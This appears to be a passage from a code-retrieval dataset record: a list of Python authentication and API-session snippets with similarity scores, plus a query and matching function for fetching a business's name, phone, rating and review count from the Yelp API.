"def load_api_keys(self):\n self.api_keys = self.config.get('keys', [])",
"def _create_redash_session():\n session = requests.Session()\n session.headers.update({'Authorization': 'Key {}'.format(API_KEY)})\n return session",
"def __authenticate(self):\n body = {\"authenticationToken\": self.__get_authentication_token()}\n result = self.__call(\"POST\", \"https://api.voiapp.io/v1/auth/session\", json=body)\n\n if result and \"accessToken\" in result and \"authenticationToken\" in result:\n self._accessToken = result[\"accessToken\"]\n self.__set_authentication_token(result[\"authenticationToken\"])\n else:\n _LOGGER.warning(\"Authentication failed: Erroneous response (%s)\", result)",
"def openai_auth():\n os.environ['OPENAI_API_KEY'] = key = load_openai_api_key()\n try:\n module = sys.modules['openai']\n module.api_key = key\n except Exception as e:\n warnings.warn('openai library has not been imported. API key not set.')",
"def test_existing_session_auth_token(self):\n\n test_header = {'X-Auth-Token': 'pretend_token'}\n\n with self.app_sess1 as c:\n ret1 = c.get('/', headers=test_header)\n ret2 = c.get('/', headers=test_header)\n self.assertEqual(ret1.data, ret2.data)",
"def token_auth(self):\n self.client = APIClient()\n self.user = User.objects.create_user(username='testuser', email='[email protected]', password='testpassword')\n self.token = Token.objects.create(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)",
"def __init__(self, **kwargs):\n\n session = vk_api.VkApi(**kwargs)\n try:\n session.auth(token_only=True)\n except vk_api.AuthError as error_msg:\n print(error_msg)\n raise\n self.api = session.get_api()",
"def vault_auth():\n # Check if vault is sealed\n if client.sys.is_sealed() == True:\n # if the vault is SEALED, UNSEAL IT using the unseal_key\n unseal_response = client.sys.submit_unseal_key(vault_unseal_key)\n\n # [Uncomment line below only if you want to generate a new API token for the application your ROOT admin registered]\n # Keep in mind you need Application Role ID and Secret ID\n client_data = client.auth_approle(vault_role_id, vault_secret_id)\n # print(client_data['auth']['client_token'])\n\n # Authenticate against the VAULT using the new CLIENT TOKEN conatained in the new dict object\n client.token = client_data['auth']['client_token']",
"def get_api_key(api_key):\n api.get(api_key)",
"async def _fetch_access_token(session: ClientSession) -> dict:\n LOGGER.debug('fetching access token...')\n password = config.get('WFWX_SECRET')\n user = config.get('WFWX_USER')\n auth_url = config.get('WFWX_AUTH_URL')\n async with session.get(auth_url, auth=BasicAuth(login=user, password=password)) as response:\n return await response.json()",
"def test001_authenticate_user(self):\n self.lg('%s STARTED' % self._testID)\n\n self.lg('- Create user1 with admin access ')\n old_password = str(uuid.uuid4()).replace('-', '')[0:10]\n user1 = self.cloudbroker_user_create(group='admin', password=old_password)\n\n self.lg(\"- Authenticate U1 ,should return session key[user1_key] .\")\n user1_key = self.get_authenticated_user_api(username=user1, password=old_password)\n self.assertTrue(user1_key)\n\n self.lg(\"- Use U1's key to list the accounts for U1, should succeed.\")\n accounts_list = user1_key.cloudapi.accounts.list()\n self.assertEqual(accounts_list, [])",
"def setup(self):\n self.session = requests.session()\n self.session.headers.update({'Authorization': 'token %s' %\n self.access_token,\n 'Content-Type': 'application/json'})\n self.base_url = self.base_url_parts",
"def _login_vapi(self):\n session = requests.Session()\n session.verify = self.validate_certs\n if not self.validate_certs:\n # Disable warning shown at stdout\n requests.packages.urllib3.disable_warnings()\n\n print(\"logging in\")\n client = create_vsphere_client(server=self.hostname,\n username=self.username,\n password=self.password,\n session=session)\n if client is None:\n raise Exception(\"Failed to login to %s using %s\" %\n (self.hostname, self.username))\n return client",
"def get_key(self, user, api_key):\n return True",
"def auth():\n pass",
"def auth():\n pass",
"def authenticate(self):\n try:\n self._token = self._lookup_token()\n except:\n raise HTTPError(\n \"Unable to get short-lived access token for cyberark storage\"\n )",
"def signin(self, username=None, password=None):\n try:\n loadAPI_key(username, password)\n databases.checkUser(username, password)\n print(\"API KEY\")\n signing_key = cherrypy.session['signing_key']\n\n pubkey_hex = signing_key.verify_key.encode(encoder=nacl.encoding.HexEncoder)\n pubkey_hex_str = pubkey_hex.decode('utf-8')\n\n message_bytes = bytes(pubkey_hex_str + username, encoding='utf-8')\n signed = signing_key.sign(message_bytes, encoder=nacl.encoding.HexEncoder)\n signature_hex_str = signed.signature.decode('utf-8')\n\n addPubkey(pubkey_hex_str, signature_hex_str)\n\n error = authoriseUserLogin(pubkey_hex_str)\n\n headers = {\n 'X-username': username,\n 'X-apikey': cherrypy.session['api_key'],\n 'Content-Type': 'application/json; charset=utf-8',\n }\n\n loginserver_record_get = requests.get(url=\"http://cs302.kiwi.land/api/get_loginserver_record\", headers=headers).json()\n loginserver_record = loginserver_record_get[\"loginserver_record\"]\n\n print(error)\n if error != 1:\n cherrypy.session['pubkey_hex_str'] = pubkey_hex_str\n cherrypy.session['signature_hex_str'] = signature_hex_str\n cherrypy.session['loginserver_record'] = loginserver_record\n getListAPI()\n userList = listUsers()\n requests.get(url=\"http://cs302.kiwi.land/api/check_pubkey\", headers=headers)\n ping()\n raise cherrypy.HTTPRedirect('/')\n else:\n raise cherrypy.HTTPRedirect('/login?bad_attempt=1')\n except:\n raise cherrypy.HTTPRedirect('/index')",
"def connect(api, username, password):\n\treturn api.login(username, password)",
"def connect(self):\n r = authentication.token(connection=self)\n\n\n self.auth_token = r.json().get('token')",
"def get_api_keys(self, **kwargs):\n\n all_params = ['page', 'per_page', '_from', 'to', 'sort_dir', 'sort_field', 'filters']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_api_keys\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/apikeys'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'page' in params:\n query_params['_page'] = params['page']\n if 'per_page' in params:\n query_params['_perPage'] = params['per_page']\n if '_from' in params:\n query_params['_from'] = params['_from']\n if 'to' in params:\n query_params['_to'] = params['to']\n if 'sort_dir' in params:\n query_params['_sortDir'] = params['sort_dir']\n if 'sort_field' in params:\n query_params['_sortField'] = params['sort_field']\n if 'filters' in params:\n query_params['_filters'] = params['filters']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['privileges', 'apikey']\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='list[ApiKey]',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"async def authenticate(self, request: web.Request) -> Dict[str, Any]:",
"def getNextApiKey(self):\n\n self.resetSession(get_new_api_key=False)\n\n if self.key_idx == len(self.api_keys):\n self.key_idx = 0\n\n self.session.auth = (self.api_keys[self.key_idx][0], '')\n self.number_of_max_req = self.api_keys[self.key_idx][1]\n\n self.key_idx += 1",
"def authenticate(credentials):",
"def test_session(self, k8sconfig):\n # Basic.\n config = k8sconfig._replace(token=None)\n sess = k8s.session(config)\n assert \"authorization\" not in sess.headers\n\n # With access token.\n config = k8sconfig._replace(token=\"token\")\n sess = k8s.session(config)\n assert sess.headers[\"authorization\"] == \"Bearer token\"\n\n # With access token and client certificate.\n ccert = k8s.K8sClientCert(crt=\"foo\", key=\"bar\")\n config = k8sconfig._replace(token=\"token\", client_cert=ccert)\n sess = k8s.session(config)\n assert sess.headers[\"authorization\"] == \"Bearer token\"\n assert sess.cert == (\"foo\", \"bar\")",
"def __init__(self, session: ClientSession, token: str, *, api_base: str = API_BASE):\r\n self._session = session\r\n self._token = token\r\n self._api_base = api_base",
"def get_api_key(self):\r\n url = '{0}/{1}'.format(self.get_url(), 'api_key')\r\n\r\n return http.Request('GET', url), parsers.parse_json",
"def _initialize_session(self):\n session = requests.Session()\n session.auth = (self.login, self.password)\n session.verify = False\n session.headers.update({'Accept': 'application/json'})\n session.headers.update({'Content-type': 'application/json'})\n return session",
"def authenticate(self) -> api.API:\r\n original_api = api.API()\r\n for c in self._credentials: # each app\r\n user_auth = tweepy.OAuthHandler(c.consumer_key, c.consumer_secret)\r\n user_auth.set_access_token(c.access_token, c.access_secret)\r\n app_auth = tweepy.AppAuthHandler(c.consumer_key, c.consumer_secret)\r\n original_api.append(tweepy.API(user_auth), tweepy.API(app_auth))\r\n return original_api",
"def generate_access_key(self):\n\t\tfrom app import app\n\t\ts = JSONWebSignatureSerializer(app.config['SECRET_KEY'])\n\t\taccess_key = s.dumps({'username': self.username}) \n\t\tself.access_key = access_key",
"def api():\n global KEY_FILE\n global APCA_API_KEY_ID\n global APCA_API_SECRET_KEY\n\n if \"APCA_ID\" in os.environ:\n APCA_ID = os.environ[\"APCA_ID\"]\n APCA_KEY = os.environ[\"APCA_KEY\"]\n elif KEY_FILE:\n auth_header = authentication_header()\n APCA_ID = str(auth_header[\"APCA-API-KEY-ID\"])\n APCA_KEY = str(auth_header[\"APCA-API-SECRET-KEY\"])\n else:\n APCA_ID = APCA_API_KEY_ID\n APCA_KEY = APCA_API_SECRET_KEY\n\n # Open the API connection\n api = tradeapi.REST(APCA_ID, APCA_KEY, \"https://paper-api.alpaca.markets\")\n # Get account info\n api.get_account()\n return api",
"def auth(self):\n try:\n print(\"You are going to log in as Полигон\")\n os.system('clear')\n self.session = vk_api.VkApi(token=self.token)\n self.session._auth_token()\n print(\"authred\")\n vk = self.session.get_api()\n global authed\n self.authed = True\n print('gAut Online')\n self.longpollserver = bot_longpoll.VkBotLongPoll(self.session, 172301854)\n self.gLPS = threading.Thread(target=self.lps, args=(self.session, ), daemon=True)\n return True\n except Exception as e:\n print(e)\n pass",
"def get_session():\n\n jwt_secret = base64.urlsafe_b64decode(os.getenv('AUTH0_CLIENT_SECRET'))\n claims = {\n 'sub': 'rf|airflow-user',\n 'iat': datetime.utcnow(),\n 'exp': datetime.utcnow() + timedelta(hours=3)\n }\n encoded_jwt = jwt.encode(claims, jwt_secret, algorithm='HS256')\n session = requests.Session()\n\n session.headers.update({'Authorization': 'Bearer {}'.format(encoded_jwt)})\n return session",
"def test_auth(self):\n self.api.auth()\n self.assertIsNotNone(self.api.session, msg=\"auth() doesn't return a session\")\n\n self.api.request('logout')\n self.assertIn('list', self.api.request('sys.settings.get').data,\n msg=\"auth() doesn't restore sessions expired\")",
"def open(self):\n auth = {'user': self._username, 'password': self._password}\n status, data = self.post('credentials', body=auth)\n if status == 201:\n # 201 (created) => Session succefully created\n self._headers.update({'X-HP3PAR-WSAPI-SessionKey': data['key']})\n self._key = data['key']\n elif status == 403:\n # 403 (forbidden) => Wrong user or password\n raise AuthError('Cannot connect to StoreServ. '\n 'Authentification error: %s', data['desc'])",
"def vk_sign_in(self):\r\n\r\n app_id = 5531757\r\n print('\\n\\n**********АВТОРИЗАЦИЯ**********\\n\\n')\r\n if (self.json_data['auth_info']['login'] and self.json_data['auth_info']['password'] and\r\n self.json_data['auth_info']['login_key'] and self.json_data['auth_info']['password_key']):\r\n user_login = self.decrypt(self.json_data['auth_info']['login'], self.json_data['auth_info']['login_key'])\r\n user_password = self.decrypt(self.json_data['auth_info']['password'], self.json_data['auth_info']['password_key'])\r\n else:\r\n user_login = input('Введите имя пользователя (e-mail): ')\r\n user_password = input('Введите пароль: ')\r\n print(\"Желаете сохранить логин/пароль? (y/n)\")\r\n while True:\r\n desision = input();\r\n if desision == 'y':\r\n enc_login = self.encrypt(user_login)\r\n enc_password = self.encrypt(user_password)\r\n self.json_data['auth_info'] = {'login': enc_login[0],\r\n 'password': enc_password[0],\r\n 'login_key': enc_login[1],\r\n 'password_key': enc_password[1]}\r\n self.save_json_data()\r\n break\r\n elif desision == 'n':\r\n break\r\n\r\n\r\n print('Создание сессии, ожидайте...')\r\n self.session = vk.AuthSession(app_id=app_id, user_login=user_login, user_password=user_password,\r\n scope=\"wall, messages\")\r\n print('Сессия создана...')\r\n print('Подключение к VK api...')\r\n self.vkapi = vk.API(self.session, timeout=300)\r\n print('Подключено...\\n')",
"def test_login(self, mock):\n _setup_responses(mock)\n api = LiveStreamApi(\"user\", \"pass\")\n\n api.login()\n\n with self.subTest(\"stores the token on the api object\"):\n self.assertEqual(api._token, \"ffffffffffffffffffffffffffffffffffffffff\")\n\n with self.subTest(\"stores ssesyranac cookie on the api object\"):\n self.assertEqual(api._ssesyranac, \"ssesyranac\")",
"def async_get_api_key(self, splunk_cookie, auth_header):\n uri = self.get_api_key_uri()\n return self.async_get_request(uri, headers={'splunkd_8089':splunk_cookie}, auth_header=auth_header)",
"def getToken():\n # First check if query is okay or not\n data = json.loads(request.data)\n username = data.get(\"username\",None)\n password = data.get(\"password\",None)\n \n if username is None or password is None:\n return jsonify({\n \"error\" : \"Incorrect API Request\",\n \"code\" : \"400\" # Bad request\n })\n check_header = magiccheck(request.headers.get('X-VITASK-API'))\n if(check_header == False):\n return jsonify({\n \"error\" : \"Invalid Header\",\n \"code\" : \"403\" # Unauthorised\n })\n # Now began actual work\n username = username.upper()\n \n # This API is only to get user token and get personal details. For syncing details, there will be a seperate API\n # This assumes that token is None just like previous authenticate\n valid = True\n try:\n sess, valid = generate_session(username, password)\n except Exception as e:\n return jsonify({\n \"error\" : \"Something broke\",\n \"code\" : \"500\"\n })\n if( valid == False ):\n # Password incorrect\n return jsonify({\n \"error\" : \"Incorrect Password\"\n })\n ref = db.reference('vitask')\n try:\n profile = {}\n profile, status = get_student_profile(sess, username)\n if( status == False ):\n print(\"Failed at profile.\")\n return jsonify({\"Error\": \"Internal Error in fetching profile.Please try again.\"})\n session['id'] = profile['appNo']\n session['name'] = profile['name']\n session['reg'] = profile['regNo']\n session['loggedin'] = 1\n except Exception as e:\n print(e)\n return jsonify({\"Error\": \"Internal Error in fetching profile.Please try again.\"})\n finally:\n # Timetable,Attendance,Acadhistory and Marks fetching\n try:\n status = parallel_timetable(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at timetable.\")\n return jsonify({\"Error\": \"Internal Error in fetching timetable.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at timetable.\")\n return jsonify({\"Error\": \"Internal Error in fetching timetable.Please try again.\"})\n finally:\n try:\n status = parallel_attendance(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at attendance.\")\n return jsonify({\"Error\": \"Internal Error in fetching attendance.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at attendance.\")\n return jsonify({\"Error\": \"Internal Error in fetching attendance.Please try again.\"})\n finally:\n try:\n status = parallel_acadhistory(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at acadhistory.\")\n return jsonify({\"Error\": \"Internal Error in fetching academic history.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at acadhistory.\")\n return jsonify({\"Error\": \"Internal Error in fetching academic history.Please try again.\"})\n finally:\n try:\n status = parallel_marks(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at marks.\")\n return jsonify({\"Error\": \"Internal Error in fetching marks.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at marks.\")\n return jsonify({\"Error\": \"Internal Error in fetching marks.Please try again.\"})\n finally:\n # API Calls logging\n temp = ref.child(\"account\").child('account-'+profile['appNo']).child(profile['appNo']).get()\n count = int(temp['API-Calls']) + 1\n tut_ref = ref.child(\"account\")\n new_ref = tut_ref.child('account-'+profile['appNo'])\n new_ref.set({\n profile['appNo']: {\n 'X-VITASK-API': temp['X-VITASK-API'],\n 'Name': temp['Name'],\n 'RegNo': temp['RegNo'],\n 'Account-Type': temp['Account-Type'],\n 'API-Calls': count,\n 'Start-Date': temp['Start-Date'],\n 'End-Date': temp['End-Date']\n }\n })\n return jsonify({'Name': profile['name'],'School': profile['school'],'Branch': profile['branch'],'Program': profile['program'],'RegNo': profile['regNo'],'AppNo': profile['appNo'],'Email': profile['email'],'ProctorEmail': profile['proctorEmail'],'ProctorName': profile['proctorName'],'APItoken': profile['token']})",
"def _require_login(self):\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + str(self.token))",
"def auth_step_1(request):\n print(\"Auth Step 1 ..... \")\n credentials = getattr(settings, \"ZERODHA_CREDENTIALS\")\n if not credentials:\n return HttpResponse(\"Invalid Credentials\")\n\n api_key = credentials.get(\"api_key\")\n if not api_key:\n return HttpResponse(\"Invalid Credentials\")\n\n return redirect(\n \"https://kite.zerodha.com/connect/login?v=3&api_key={}\".format(api_key)\n )",
"def __init__(self, api_key, api_secret, base_url=settings.TWITTER_API_URL):\n self.api_key = api_key\n self.api_secret = api_secret\n self.base_url = base_url\n self.bearer_token = None\n self.__auth = None\n self.get_bearer_token()\n self.set_requests_auth()\n self.session = requests_retry_session()",
"def _v3_auth(self, url):\n body = {\n \"auth\": {\n \"identity\": {\n \"methods\": [\"password\"],\n \"password\": {\n \"user\": {\n \"domain\": {\n \"name\": self.domain\n },\n \"name\": self.user,\n \"password\": self.password\n }\n }\n },\n \"scope\": {\n \"project\": {\n \"domain\": {\n \"name\": self.domain\n },\n \"name\": self.project\n }\n }\n }\n }\n if not url.endswith('/'):\n url += \"/\"\n return self.post(url + 'auth/tokens', body)",
"def authenticate(self):\n # Check if we already have access token and secret\n if not os.path.exists(self.sTOKEN_FILE):\n # 1) Obtain Request token\n oauth = OAuth1(self.apiKey, client_secret=self.apiKeySecret, callback_uri='oob')\n r = requests.post(url=self.sREQUEST_TOKEN_URL, auth=oauth)\n credentials = parse_qs(r.content)\n resource_owner_key = credentials.get('oauth_token')[0]\n resource_owner_secret = credentials.get('oauth_token_secret')[0]\n\n # 2) Obtain authorization for the user to access resources\n # Redirect the user to /authorize and get the callback\n authorize_url = self.sAUTHORIZE_URL + '?oauth_token=' + resource_owner_key + \\\n '&oauth_consumer_key=' + self.apiKey + \\\n '&Access=Full&Permissions=Modify'\n\n print 'Please go here and authorize,', authorize_url\n verifier = raw_input('Please enter the six-digit PIN code: ')\n\n # 3) Obtain final access token\n oauth = OAuth1(self.apiKey, client_secret = self.apiKeySecret,\n resource_owner_key = resource_owner_key,\n resource_owner_secret = resource_owner_secret,\n verifier=verifier)\n r = requests.post(url=self.sACCESS_TOKEN_URL, auth=oauth)\n\n credentials = parse_qs(r.content)\n access_token = credentials.get('oauth_token')[0]\n access_token_secret = credentials.get('oauth_token_secret')[0]\n\n # Store access token so we can use it later\n with open(self.sTOKEN_FILE, 'w') as f:\n json.dump({'access_token': access_token,\n 'access_token_secret': access_token_secret}, f)\n\n else:\n with open(self.sTOKEN_FILE, 'r') as f:\n tokens = json.load(f)\n access_token = tokens.get('access_token')\n access_token_secret = tokens.get('access_token_secret')\n\n # store the file access token details for use in other methods\n self.accessToken = access_token\n self.accessTokenSecret = access_token_secret",
"def login():\n tree = xml.parse('credentials.xml')\n root = tree.getroot()\n apikey = root.find('apikey').text\n userkey = root.find('userkey').text\n username = root.find('username').text\n url = 'https://api.thetvdb.com/login'\n headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}\n auth = {\"apikey\": apikey, \"userkey\": userkey, \"username\": username}\n r = requests.post(url, headers=headers, data=json.dumps(auth))\n json_data = json.loads(r.text)\n token = json_data.get('token')\n return token",
"def auth(self):\n return self.creds(\"[email protected]\", cookie=\"USERTOKEN: authcookie\")",
"def setCredentials(self,api_id,api_secret):\n self.api_id = api_id\n self.api_secret = api_secret",
"def _auto_auth(self, **params):\r\n response = self.client.get(self.url, params)\r\n self.assertEqual(response.status_code, 200)\r\n\r\n # Check that session and CSRF are set in the response\r\n for cookie in ['csrftoken', 'sessionid']:\r\n self.assertIn(cookie, response.cookies) # pylint: disable=E1103\r\n self.assertTrue(response.cookies[cookie].value) # pylint: disable=E1103\r",
"def sessionkey(cls, session):\n return session[\"credential\"][\"Authorization\"]",
"def __init__(self, url, username, password):\n self.session = requests.session()\n self.session.auth = (username, password)\n self.session.headers.update({\n 'Accept': JSON_CONTENT_TYPE,\n })\n self.url = url",
"def set_auth(self):\n timestamp = str(int(time.time()))\n unique = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(16))\n hashstr = sha1((self.callerid + timestamp +\n self.privatekey + unique).encode('utf8')).hexdigest()\n logger.debug(\"Time from api {}\".format(timestamp))\n\n return {\"callerId\": self.callerid,\n \"time\": timestamp,\n \"unique\": unique,\n \"hash\": hashstr\n }",
"def get_saucelabs_username_and_key():\r\n return {\"username\": settings.SAUCE.get('USERNAME'), \"access-key\": settings.SAUCE.get('ACCESS_ID')}",
"def auth():\n\n if current_user.is_authenticated:\n\n # OAuth is only necesary when we don't have a user's API\n if not current_user.zoter_api:\n\n def get_auth_url():\n request_token, request_token_secret = zoteroAuth.get_request_token()\n session['request_token'] = request_token\n session['request_token_secret'] = request_token_secret\n auth_url = zoteroAuth.get_authorize_url(request_token)\n return auth_url\n\n flash('Hi! {}, please visit <a href=\"{}\" target=\"new\">here</a> for authentication.'.format(current_user.username, get_auth_url()))\n return redirect(url_for('bookshelf'))\n \n else:\n flash('You already have an API key!')\n return redirect(url_for('sync'))",
"def __init__(self, apikey, secret):\n self.apikey = apikey\n self.secret = secret",
"def load_config_key():\n try:\n global api_key\n api_key = os.environ['IN_API_KEY']\n if len(api_key) == 32:\n try:\n int(api_key, 16)\n except ValueError:\n print(\"Invalid API key\")\n except KeyError:\n print('No API Token detected. '\n 'Please visit {0} and get an API Token, '\n 'which will be used by instantnews '\n 'to get access to the data.'\n .format(API_URL))\n sys.exit(1)",
"def __init__(self, public_key, private_key, token, token_secret, base_url='http://api.telldus.com'):\n self.public_key = public_key\n self.private_key = private_key\n self.token = token\n self.token_secret = token_secret\n\n self.base_url = base_url\n\n self.oauth = self.generate_temp_session()",
"def hmac_authentication(self, identity: str, secret: str) -> None:\n self.api_session.auth = HmacAuth(identity=identity, secret=secret)",
"def set_credentials():",
"async def authenticate(hass: core.HomeAssistant, host, port, servers):\n\n hub = RoonHub(hass)\n (token, core_id, core_name) = await hub.authenticate(host, port, servers)\n if token is None:\n raise InvalidAuth\n\n return {\n CONF_HOST: host,\n CONF_PORT: port,\n CONF_ROON_ID: core_id,\n CONF_ROON_NAME: core_name,\n CONF_API_KEY: token,\n }",
"def get_session_keys(conn, pairing_data):\n headers = {\n 'Content-Type': 'application/pairing+tlv8'\n }\n\n #\n # Step #1 ios --> accessory (send verify start Request) (page 47)\n #\n ios_key = py25519.Key25519()\n\n request_tlv = TLV.encode_list([\n (TLV.kTLVType_State, TLV.M1),\n (TLV.kTLVType_PublicKey, ios_key.pubkey)\n ])\n\n conn.request('POST', '/pair-verify', request_tlv, headers)\n resp = conn.getresponse()\n response_tlv = TLV.decode_bytes(resp.read())\n\n #\n # Step #3 ios --> accessory (send SRP verify request) (page 49)\n #\n assert TLV.kTLVType_State in response_tlv, response_tlv\n assert response_tlv[TLV.kTLVType_State] == TLV.M2\n assert TLV.kTLVType_PublicKey in response_tlv, response_tlv\n assert TLV.kTLVType_EncryptedData in response_tlv, response_tlv\n\n # 1) generate shared secret\n accessorys_session_pub_key_bytes = response_tlv[TLV.kTLVType_PublicKey]\n shared_secret = ios_key.get_ecdh_key(\n py25519.Key25519(pubkey=bytes(accessorys_session_pub_key_bytes), verifyingkey=bytes()))\n\n # 2) derive session key\n hkdf_inst = hkdf.Hkdf('Pair-Verify-Encrypt-Salt'.encode(), shared_secret, hash=hashlib.sha512)\n session_key = hkdf_inst.expand('Pair-Verify-Encrypt-Info'.encode(), 32)\n\n # 3) verify authtag on encrypted data and 4) decrypt\n encrypted = response_tlv[TLV.kTLVType_EncryptedData]\n decrypted = chacha20_aead_decrypt(bytes(), session_key, 'PV-Msg02'.encode(), bytes([0, 0, 0, 0]),\n encrypted)\n if decrypted == False:\n raise homekit.exception.InvalidAuth(\"step 3\")\n d1 = TLV.decode_bytes(decrypted)\n assert TLV.kTLVType_Identifier in d1\n assert TLV.kTLVType_Signature in d1\n\n # 5) look up pairing by accessory name\n accessory_name = d1[TLV.kTLVType_Identifier].decode()\n\n if pairing_data['AccessoryPairingID'] != accessory_name:\n raise homekit.exception.IncorrectPairingID(\"step 3\")\n \n accessory_ltpk = py25519.Key25519(pubkey=bytes(), verifyingkey=bytes.fromhex(pairing_data['AccessoryLTPK']))\n\n # 6) verify accessory's signature\n accessory_sig = d1[TLV.kTLVType_Signature]\n accessory_session_pub_key_bytes = response_tlv[TLV.kTLVType_PublicKey]\n accessory_info = accessory_session_pub_key_bytes + accessory_name.encode() + ios_key.pubkey\n if not accessory_ltpk.verify(bytes(accessory_sig), bytes(accessory_info)):\n raise homekit.exception.InvalidSignature(\"step 3\")\n\n # 7) create iOSDeviceInfo\n ios_device_info = ios_key.pubkey + pairing_data['iOSPairingId'].encode() + accessorys_session_pub_key_bytes\n\n # 8) sign iOSDeviceInfo with long term secret key\n ios_device_ltsk_h = pairing_data['iOSDeviceLTSK']\n ios_device_ltsk = py25519.Key25519(secretkey=bytes.fromhex(ios_device_ltsk_h))\n ios_device_signature = ios_device_ltsk.sign(ios_device_info)\n\n # 9) construct sub tlv\n sub_tlv = TLV.encode_list([\n (TLV.kTLVType_Identifier, pairing_data['iOSPairingId'].encode()),\n (TLV.kTLVType_Signature, ios_device_signature)\n ])\n\n # 10) encrypt and sign\n encrypted_data_with_auth_tag = chacha20_aead_encrypt(bytes(), session_key, 'PV-Msg03'.encode(), bytes([0, 0, 0, 0]),\n sub_tlv)\n tmp = bytearray(encrypted_data_with_auth_tag[0])\n tmp += encrypted_data_with_auth_tag[1]\n\n # 11) create tlv\n request_tlv = TLV.encode_list([\n (TLV.kTLVType_State, TLV.M3),\n (TLV.kTLVType_EncryptedData, tmp)\n ])\n\n # 12) send to accessory\n conn.request('POST', '/pair-verify', request_tlv, headers)\n resp = conn.getresponse()\n response_tlv = TLV.decode_bytes(resp.read())\n\n #\n # Post Step #4 verification (page 51)\n #\n if TLV.kTLVType_Error in response_tlv:\n error_handler(response_tlv[TLV.kTLVType_Error], \"verification\")\n assert TLV.kTLVType_State in response_tlv\n assert response_tlv[TLV.kTLVType_State] == TLV.M4\n\n # calculate session keys\n hkdf_inst = hkdf.Hkdf('Control-Salt'.encode(), shared_secret, hash=hashlib.sha512)\n controller_to_accessory_key = hkdf_inst.expand('Control-Write-Encryption-Key'.encode(), 32)\n\n hkdf_inst = hkdf.Hkdf('Control-Salt'.encode(), shared_secret, hash=hashlib.sha512)\n accessory_to_controller_key = hkdf_inst.expand('Control-Read-Encryption-Key'.encode(), 32)\n\n return controller_to_accessory_key, accessory_to_controller_key",
"def login(self):",
"def authenticate_spotify_api(SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET):\r\n auth_manager = SpotifyClientCredentials(client_id = SPOTIPY_CLIENT_ID, \r\n client_secret=SPOTIPY_CLIENT_SECRET)\r\n \r\n return spotipy.Spotify(auth_manager=auth_manager)",
"def api_auth():\n form = request.get_json(force=True)\n userdata = None\n if form['register']:\n userdata = userProvider.register_user(\n form['username'].encode('utf8'),\n form['password'].encode('utf8')\n )\n else:\n userdata = userProvider.load_authenticated_user(\n form['username'].encode('utf8'),\n form['password'].encode('utf8')\n )\n if userdata:\n user = userProvider.userdata_to_user(userdata)\n flask_login.login_user(user)\n return \"true\"\n raise Exception(\"No user loaded\")"
] | [
"0.7194135",
"0.6754284",
"0.6635698",
"0.65901494",
"0.65472263",
"0.65440655",
"0.6510905",
"0.64644027",
"0.64317477",
"0.6324179",
"0.6274898",
"0.6266883",
"0.6257447",
"0.62521726",
"0.6238254",
"0.6219152",
"0.62120575",
"0.61796516",
"0.6170831",
"0.615797",
"0.6153606",
"0.6136933",
"0.6130101",
"0.6128051",
"0.61126316",
"0.6107248",
"0.61066324",
"0.60973",
"0.60969853",
"0.60941",
"0.6088811",
"0.60719377",
"0.6061616",
"0.6060318",
"0.6036018",
"0.6031797",
"0.6027031",
"0.6021748",
"0.6020879",
"0.60204345",
"0.60059136",
"0.6003962",
"0.6003253",
"0.59936655",
"0.5969332",
"0.5958109",
"0.59557736",
"0.59530914",
"0.59518397",
"0.5944707",
"0.59283024",
"0.59186363",
"0.58865273",
"0.58865273",
"0.5882823",
"0.58808255",
"0.5879482",
"0.5878938",
"0.58779144",
"0.587716",
"0.5874256",
"0.5871344",
"0.5871059",
"0.58655065",
"0.5858993",
"0.5856449",
"0.58512455",
"0.5847875",
"0.5842699",
"0.58403003",
"0.5830978",
"0.5829475",
"0.58265257",
"0.58212334",
"0.58139694",
"0.58135885",
"0.5809314",
"0.5808096",
"0.5807546",
"0.58065236",
"0.57978255",
"0.579713",
"0.5789449",
"0.57807046",
"0.57800525",
"0.57793987",
"0.5770093",
"0.57671666",
"0.5765567",
"0.57648075",
"0.57526594",
"0.5749355",
"0.5748046",
"0.5747278",
"0.5741972",
"0.5739011",
"0.57380474",
"0.5736054",
"0.5726738",
"0.5725471",
"0.572064"
] | 0.0 | -1 |
bridge the connection between Yelp API, get_results and get_search_parameters functions. Returns one result at a time since we are expecting top result per name searched | def main(self, name):
api_results = []
params = self.get_search_parameters(name)
api_results.append(self.api_connect(params))
time.sleep(1.0)
key = api_results[0]['businesses'][0]
business_information = [key['name'], self.phone_number_organizer(key), key['rating'],\
key['review_count']]
return business_information | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def query_api(term, location):\n response = search(term, location)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print 'No businesses for {0} in {1} found.'.format(term, location)\n return\n\n business_id = businesses[0]['id']\n \n print '{0} businesses found, querying business info for the top result \"{1}\" ...'.format(\n len(businesses),\n business_id\n )\n \n response=[]\n for biz in range(len(businesses)):\n response.append(get_business(businesses[biz]['id']))\n #response = get_business(business_id)\n return response",
